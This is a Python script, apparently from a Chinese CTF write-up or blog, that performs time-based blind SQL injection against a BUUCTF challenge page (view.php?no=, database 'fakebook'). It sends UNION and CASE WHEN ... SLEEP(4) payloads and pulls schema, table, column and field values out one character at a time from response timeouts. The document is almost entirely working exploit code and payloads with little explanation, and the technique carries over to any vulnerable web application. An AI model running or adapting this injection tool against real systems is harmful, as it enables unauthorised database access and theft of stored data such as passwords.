脚本
# encoding:utf-8
import hashlib
import requests
import re
import time
import string
characters = string.ascii_letters + string.digits
max_length = 200
target = 'http://1eb82f8a-5494-47fc-88af-8bdd6e607c1f.node3.buuoj.cn/view.php?no='
cur_database = "-1/**/union/**/select 1,/**/(case/**/when/**/(mid((select/**/group_concat(schema_name/**/separator'@')/**/from/**/information_schema/**/./**/schemata)/**/from/**/{0}/**/for/**/1)='{1}')/**/then/**/sleep(4)/**/else/**/1/**/end),3,4-- -"
def get(payload):
flag = ''
for i in range(1, max_length):
next_position = False
for char in characters+"_{}#-%();:":
payload_ = payload.format(str(i), char)
print("payload为:%s"%payload_)
try:
r = requests.get(target+payload_, timeout=3)
r.encoding = 'utf-8'
#print("响应为:%s"%r.text)
time.sleep(0.1)
except requests.exceptions.ReadTimeout:
flag += char
print(flag)
next_position = True
break
if not next_position:
return flag
# 指定数据库,获取其下全部表名
def get_table(database):
for i in range(0,5):
print("正在查询数据库" + database + "中的表")
payload = "-1 union/**/select 1, (case when (substring((" \
"select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \
"from {0} for 1)='{1}') " \
"then sleep(4) else 1 end),3,4-- -"
table = get(payload)
print( "数据库" + database + "的第"+ str(i+1) +"个表"+table)
get_col(table)
if not table:
print('数据库'+database+'中的表查询完毕')
break
# 查字段
def get_col(table):
columns = "";
for i in range(0, 5):
print("正在查询表" + table + "中的字段")
payload = "-1 union/**/select 1,( case when (substring((" \
"select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \
"from {0} for 1)='{1}') " \
"then sleep(4) else 1 end),3,4-- -"
column = get(payload)
print("表" + table + "的第" + str(i+1) + "个字段为" + column )
# print(column)
columns+=column+' '
if not column:
print("表" + table + "中的字段查询完毕 " + columns)
break
# 作为单独的模块使用吧,获取字段详细信息
def result(column, table):
for i in range(0, 5):
payload = "-1'and (select case when (substring((select "+column+" from "+table+" limit 1 offset " + str(i)+ ") from {0} for 1)='{1}') " \
"then sleep(4) else 1 end) #"
print(get(payload))
if __name__ == "__main__":
#database1 = get(cur_database)
table1 = get_table('fakebook')
#result("password", "user")
最后更新于